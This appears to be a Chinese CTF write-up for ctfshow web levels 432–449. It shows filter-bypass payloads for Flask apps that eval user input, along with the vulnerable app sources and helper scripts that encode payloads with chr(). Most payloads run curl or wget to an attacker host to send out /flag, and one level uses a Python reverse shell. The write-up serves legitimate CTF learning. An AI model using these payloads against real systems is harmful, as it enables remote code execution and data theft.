首页 > 其他分享 >ctfshow web 其他 web432--web449

ctfshow web 其他 web432--web449

时间:2024-06-22 16:56:57浏览次数:12  
标签:__ web code return -- 2bchr chr ctfshow True

web432

过滤了os|open|system|read|eval

?code=str(''.__class__.__bases__[0].__subclasses__[185].__init__.__globals__['__builtins__']['__imp'+'ort__']('o'+'s').__dict__['po'+'pen']('curl http://ip:port?1=`cat /f*`'))
?code=str(''.__class__.__bases__[0].__subclasses__()[185].__init__.__globals__['__builtins__']['__imp'+'ort__']('o'+'s').__dict__['po'+'pen']('curl http://ip:port?1=`cat /f*`'))

web433

过滤了os|open|system|read|eval|builtins

?code=str(''.__class__.__bases__[0].__subclasses__()[185].__init__.__globals__['__bui'+'ltins__']['__imp'+'ort__']('o'+'s').__dict__['po'+'pen']('curl http://ip:port?1=`cat /f*`'))
?code=str(__import__('so'[::-1]).__getattribute__('syst'+'em')('curl http://ip:port?1=`cat /f*`'))

web 434

过滤了os|open|system|read|eval|builtins|curl

?code=str(__import__('so'[::-1]).__getattribute__('syst'+'em')('cu'+'rl http://ip:port?1=`cat /f*`'))
?code=str(''.__class__.__bases__[0].__subclasses__()[185].__init__.__globals__['__bui'+'ltins__']['__imp'+'ort__']('o'+'s').__dict__['po'+'pen']('wget http://ip:port?1=`cat /f*`'))

web435–web439

过滤了os|open|system|read|eval|builtins|curl|_|getattr|{
python里面可以用分号执行多条语句
我们逆序写
在这里插入图片描述

?code=str(exec(')"`*f/ tac`=1?83121:pi//:ptth tegw"(metsys.so;so tropmi'[::-1]))

web440

过滤了os|open|system|read|eval|builtins|curl|_|getattr|{|'|"

a='import os;os.system("wget http://ip:port?1=`cat /f*`")'

def x(a):
    t=''
    for i in range(len(a)):
        if i < len(a)-1:
            t+='chr('+str(ord(a[i]))+')%2b'
        else:
            t+='chr('+str(ord(a[i]))+')'

    return t

print(x(a))

?code=str(exec(chr(105)%2bchr(109)%2bchr(112)%2bchr(111)%2bchr(114)%2bchr(116)%2bchr(32)%2bchr(111)%2bchr(115)%2bchr(59)%2bchr(111)%2bchr(115)%2bchr(46)%2bchr(115)%2bchr(121)%2bchr(115)%2bchr(116)%2bchr(101)%2bchr(109)%2bchr(40)%2bchr(34)%2bchr(119)%2bchr(103)%2bchr(101)%2bchr(116)%2bchr(32)%2bchr(104)%2bchr(116)%2bchr(116)%2bchr(112)%2bchr(58)%2bchr(47)%2bchr(47)%2bchr(50)%2bchr(55)%2bchr(46)%2bchr(50)%2bchr(53)%2bchr(46)%2bchr(49)%2bchr(53)%2bchr(49)%2bchr(46)%2bchr(54)%2bchr(58)%2bchr(57)%2bchr(57)%2bchr(57)%2bchr(57)%2bchr(63)%2bchr(49)%2bchr(61)%2bchr(96)%2bchr(99)%2bchr(97)%2bchr(116)%2bchr(32)%2bchr(47)%2bchr(102)%2bchr(42)%2bchr(96)%2bchr(34)%2bchr(41)))

web441

command = 'import os;os.system("wget http://ip:port?1=`cat /f*`")'

# 生成chr()函数调用列表
chr_list = [f'chr({ord(char)})' for char in command]

# 打印列表
# for i in chr_list:
#     print(i,end=",")

print("["+",".join(chr_list)+"]")

?code=exec(str().join([chr(105),chr(109),chr(112),chr(111),chr(114),chr(116),chr(32),chr(111),chr(115),chr(59),chr(111),chr(115),chr(46),chr(115),chr(121),chr(115),chr(116),chr(101),chr(109),chr(40),chr(34),chr(119),chr(103),chr(101),chr(116),chr(32),chr(104),chr(116),chr(116),chr(112),chr(58),chr(47),chr(47),chr(50),chr(55),chr(46),chr(50),chr(53),chr(46),chr(49),chr(53),chr(49),chr(46),chr(54),chr(58),chr(57),chr(57),chr(57),chr(57),chr(63),chr(49),chr(61),chr(96),chr(99),chr(97),chr(116),chr(32),chr(47),chr(102),chr(42),chr(96),chr(34),chr(41)]))

?code=str(exec(request.args.get(chr(97))))&a=__import__('os').system('curl http://ip:port?1=`cat /f*`')

web442

过滤了数字

?code=str(exec(request.args.get(request.method)))&GET=__import__('os').system('curl http://ip:port?1=`cat /f*`')

web443–web444

我没有写多因为payload是一样的打

我觉得好奇葩,不知道传参位置后面看了web445的源码猜出来的
POST传参:
code=str(exec(globals()[list(globals().keys())[True-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)]].args.get(globals()[list(globals().keys())[True-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)]].method)))

//str(exec(globals()[list(globals().keys())[10]].args.get(globals()[list(globals().keys())[10]].method)))
GET传参:
?POST=__import__('os').system('curl http://ip:port?p=`cat /f*`')

看到了另外一种拼接字符的方法我觉得很神,但是由于太长不能正常传入

def getNumber3(number):
    number = int(number)
    if number in [-2, -1, 0, 1]:
        return ["~int((len(str(None))/len(str(None))))", "~int(len(str()))",
                "int(len(str()))", "int((len(str(None))/len(str(None))))"][number + 2]

    if number % 2:
        return "~%s" % getNumber3(~number)
    else:
        return "(%s<<(int((len(str(None))/len(str(None))))))" % getNumber3(number / 2)

s = 'import os;os.system("curl http://xxxx?1=`cat /flag`")'
res = 'str().join(['
for i in s:
    res += f"chr({getNumber3(ord(i))}),"
res = res[:-1]
res += '])'
print(res)

web444

def getNumber3(number):
    number = int(number)
    if number in [-2, -1, 0, 1]:
        return ["~int(True)", "~int(False)",
                "int(False)", "int(True)"][number + 2]

    if number % 2:
        return "~%s" % getNumber3(~number)
    else:
        return "(%s<<(int(True)))" % getNumber3(number / 2)


def getNumber2(number):
    number = int(number)
    if number in [-2, -1, 0, 1]:
        return ["~([]<())", "~([]<[])",
                "([]<[])", "([]<())"][number + 2]

    if number % 2:
        return "~%s" % getNumber2(~number)
    else:
        return "(%s<<([]<()))" % getNumber2(number / 2)

s = 'import os;os.system("curl http://xxxx?1=`cat /flag`")'
# s = '123'
res = 'str().join(['
for i in s:
    res += f"chr({getNumber3(ord(i))}),"
res = res[:-1]
res += '])'
print(res)

web445–web446

web445:
app.py

from flask import Flask
from flask import request
import re
import os
del os.system
del os.popen

app = Flask(__name__)

def Q2B(uchar):
    inside_code = ord(uchar)
    if inside_code == 0x3000:
        inside_code = 0x0020
    else:
        inside_code -= 0xfee0
    if inside_code < 0x0020 or inside_code > 0x7e: 
        return uchar
    return chr(inside_code)

def stringQ2B(ustring):
    return "".join([Q2B(uchar) for uchar in ustring])

@app.route('/',methods=['POST', 'GET'])
def app_index():
    if request.method == 'POST':
        code = request.form['code']
        if code:
        	code = stringQ2B(code)
        	if '\\u' in code:
        		return 'hacker?'
        	if '\\x' in code:
        		return 'hacker?'
        	reg = re.compile(r'os|open|system|read|eval|builtins|curl|_|getattr|{|\'|"|\+|[0-9]|request|len')
        	if reg.search(code)==None:
        		return eval(code)
    return 'where is flag?<!-- /?code -->'

if __name__=="__main__":
    app.run(host='0.0.0.0',port=80)

web446:

from flask import Flask
from flask import request
import re
import os
import imp
del os.system
del os.popen
del imp.reload

app = Flask(__name__)

def Q2B(uchar):
    inside_code = ord(uchar)
    if inside_code == 0x3000:
        inside_code = 0x0020
    else:
        inside_code -= 0xfee0
    if inside_code < 0x0020 or inside_code > 0x7e: 
        return uchar
    return chr(inside_code)

def stringQ2B(ustring):
    return "".join([Q2B(uchar) for uchar in ustring])

@app.route('/',methods=['POST', 'GET'])
def app_index():
    if request.method == 'POST':
        code = request.form['code']
        if code:
        	code = stringQ2B(code)
        	if '\\u' in code:
        		return 'hacker?'
        	if '\\x' in code:
        		return 'hacker?'
        	reg = re.compile(r'os|open|system|read|eval|builtins|curl|_|getattr|{|\'|"|\+|[0-9]|request|len')
        	if reg.search(code)==None:
        		return eval(code)
    return 'where is flag?<!-- /?code -->'

if __name__=="__main__":
    app.run(host='0.0.0.0',port=80)

POST传参:
code=str(exec(globals()[list(globals().keys())[True-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)]].args.get(globals()[list(globals().keys())[True-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)]].method)))
GET传参:
?POST=import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ip",port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

web447

from flask import Flask
from flask import request
import re
import os
import imp
del os.system
del os.popen
del imp.reload
import subprocess
del subprocess.Popen
del subprocess.call
del subprocess.run
del subprocess.getstatusoutput
del subprocess.getoutput
del subprocess.check_call
del subprocess.check_output
import timeit
del timeit.timeit

app = Flask(__name__)

def Q2B(uchar):
    inside_code = ord(uchar)
    if inside_code == 0x3000:
        inside_code = 0x0020
    else:
        inside_code -= 0xfee0
    if inside_code < 0x0020 or inside_code > 0x7e: 
        return uchar
    return chr(inside_code)

def stringQ2B(ustring):
    return "".join([Q2B(uchar) for uchar in ustring])

@app.route('/',methods=['POST', 'GET'])
def app_index():
    if request.method == 'POST':
        code = request.form['code']
        if code:
        	code = stringQ2B(code)
        	if '\\u' in code:
        		return 'hacker?'
        	if '\\x' in code:
        		return 'hacker?'
        	reg = re.compile(r'os|open|system|read|eval|builtins|curl|_|getattr|{|\'|"|\+|[0-9]|request|len')
        	if reg.search(code)==None:
        		return eval(code)
    return 'where is flag?<!-- /?code -->'

if __name__=="__main__":
    app.run(host='0.0.0.0',port=80)

删除了很多,我们用reload重新下回来

POST传参:
code=str(exec(globals()[list(globals().keys())[True-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)]].args.get(globals()[list(globals().keys())[True-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)]].method)))
GET传参:
POST=from importlib import reload;import os;reload(os);os.system('wget http://ip:port?1=`cat /f*`');

web448

from flask import Flask
from flask import request
import re
import sys 
sys.modules['os']=None
sys.modules['imp']=None
sys.modules['subprocess']=None
sys.modules['socket']=None
sys.modules['timeit']=None
sys.modules['platform']=None

app = Flask(__name__)

def Q2B(uchar):
    inside_code = ord(uchar)
    if inside_code == 0x3000:
        inside_code = 0x0020
    else:
        inside_code -= 0xfee0
    if inside_code < 0x0020 or inside_code > 0x7e: 
        return uchar
    return chr(inside_code)

def stringQ2B(ustring):
    return "".join([Q2B(uchar) for uchar in ustring])

@app.route('/',methods=['POST', 'GET'])
def app_index():
    if request.method == 'POST':
        code = request.form['code']
        if code:
        	code = stringQ2B(code)
        	if '\\u' in code:
        		return 'hacker?'
        	if '\\x' in code:
        		return 'hacker?'
        	reg = re.compile(r'os|open|system|read|eval|builtins|curl|_|getattr|{|\'|"|\+|[0-9]|request|len')
        	if reg.search(code)==None:
        		return eval(code)
    return 'where is flag?<!-- /?code -->'

if __name__=="__main__":
    app.run(host='0.0.0.0',port=80)

POST传参:
code=str(exec(globals()[list(globals().keys())[True-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)]].args.get(globals()[list(globals().keys())[True-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)]].method)))
GET传参:
?POST=import shutil;shutil.copy('/user/local/lib/python3.8/os.py','a.py');import a;a.system('wget http://ip:port?1=`cat /f*`');

?POST=import sys;del sys.modules['os'];import os;os.system('wget http://ip:port?1=`cat /f*`');

web449

from flask import Flask
from flask import request
import re
import sys 
sys.modules['os']=None
sys.modules['imp']=None
sys.modules['subprocess']=None
sys.modules['socket']=None
sys.modules['timeit']=None
sys.modules['platform']=None
sys.modules['sys']=None

app = Flask(__name__)
sys.modules['importlib']=None
del sys

def Q2B(uchar):
    inside_code = ord(uchar)
    if inside_code == 0x3000:
        inside_code = 0x0020
    else:
        inside_code -= 0xfee0
    if inside_code < 0x0020 or inside_code > 0x7e: 
        return uchar
    return chr(inside_code)

def stringQ2B(ustring):
    return "".join([Q2B(uchar) for uchar in ustring])


@app.route('/',methods=['POST', 'GET'])
def app_index():
    if request.method == 'POST':
        code = request.form['code']
        if code:
        	code = stringQ2B(code)
        	if '\\u' in code:
        		return 'hacker?'
        	if '\\x' in code:
        		return 'hacker?'
        	reg = re.compile(r'os|open|system|read|eval|builtins|curl|_|getattr|{|\'|"|\+|[0-9]|request|len')
        	if reg.search(code)==None:
        		return eval(code)
    return 'where is flag?<!-- /?code -->'

if __name__=="__main__":
    app.run(host='0.0.0.0',port=80)

GET传参:
?POST=s = open('/flag').read();import urllib;urllib.request.urlopen('http://ip:port?1='%2bs);
POST 传参:
code=str(exec(globals()[list(globals().keys())[True-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)]].args.get(globals()[list(globals().keys())[True-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)]].method)))

标签:__,web,code,return,--,2bchr,chr,ctfshow,True
From: https://blog.csdn.net/2301_81040377/article/details/139880912

相关文章

  • tmux的使用
    简单的介绍常用到的了解会话和窗口的区别?如何为session创建window呢?如何为window改名字呢?常用到的查看已创建会话:tmuxls创建新的会话:tmuxnew-s名字离开当前会话:tmuxdetach(注意是离开,并不是杀死哦!)进入指定会话:tmuxattach-t名字或者是tmuxa-t......
  • ctfshow 2023 愚人杯 web
    easy_signin观察url,发现base64,进行解码,原来可以访问文件路径,那我们访问一下index.php?img=aW5kZXgucGhw查看源代码发现还是base64解码得到flag被遗忘的反序列化<?php#当前目录中有一个txt文件哦error_reporting(0);show_source(__FILE__);include("check.p......
  • 第 K 小数
    这可不是基础题的第k小数哈。自己想出来的,感觉要容易想到,使用可持久化线段树,时间上要比y的慢一倍。大体思想就是,我们从小到大依次加入一个数,每加入一个就记录一个版本,线段树里记录区间里数的数量,在查询时,只要二分出区间数的数量大于等于k的最小版本即可,这个版本对应插入的点就是......
  • 使用Kubesec检查YAML文件安全
    目录一.系统环境二.前言三.Kubesec简介四.使用Kubesec检查YAML文件安全五.总结一.系统环境本文主要基于Kubernetes1.22.2和Linux操作系统Ubuntu18.04。服务器版本docker软件版本Kubernetes(k8s)集群版本CPU架构Ubuntu18.04.5LTSDockerversion20.10.14v1.22.2......
  • 深度学习(中文word2vec)
    这里用了gensim和jiba分词库,jensim原生是支持英文的,如果想使用中文word2vec,还需要自己训练一下。中文语料库可以在这里下载:https://dumps.wikimedia.org/zhwiki/latest/zhwiki-latest-pages-articles.xml.bz2 stopwords.txt这里下载:https://files.cnblogs.com/files/tiandsp/st......
  • SqlserverCDCcrudSourceSink mssql数据实时同步demo
    packageorg.hu.fk.datastream_connector;importcom.alibaba.fastjson.JSON;importcom.alibaba.fastjson.JSONObject;importcom.ververica.cdc.connectors.base.options.StartupOptions;importcom.ververica.cdc.connectors.shaded.org.apache.kafka.connect.data.Fie......
  • 实验7
    task1#include<stdio.h>#defineN80#defineM100typedefstruct{charname[N];charauthor[N];}Book;voidfunc1();voidfunc2();intmain(){func1();func2();return0;}voidfunc1(){Bookx[]={{"......
  • 装机硬件
    装机排线:1内部排线1.1机箱————————————————1前面板灯线❌(此主机无)2USB3.0蓝色数据线3USB2.0黑色数据线4AUDIO音频线5RESETSW重启6POWERSW开关线7H.D.DLED±硬盘指示灯8POWERLED+电源开关指示灯9POWERLED-电源开关指示灯————......
  • 新高考越这样改,县中出“尖子生”越难 | 转载
    2024/6/2109:13来自上海观察者网官方账号【文/观察者网专栏作者邓碧玲】一、在县中,教学和考试成了两回事2022年高考全国I卷的数学试卷中出现了二级结论相关的题目,湖南省Y县一中在暑期专门组织教师培训20天关于二级结论的解题技巧,这在之后的数学课堂中也成为了重点内容。但遗憾......
  • 可持久化Trie
    更好的体验带注释的代码开始理解可持久化,这里因为是acwing打卡,可以放图片了有可能会用图片,尽量打字可持久化trie,就是一个trie树但是可以通过不同的开头(root),变成每个历史状态这里就用到上面的图片了,每次更新trie树,这条新加入的链一定要......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99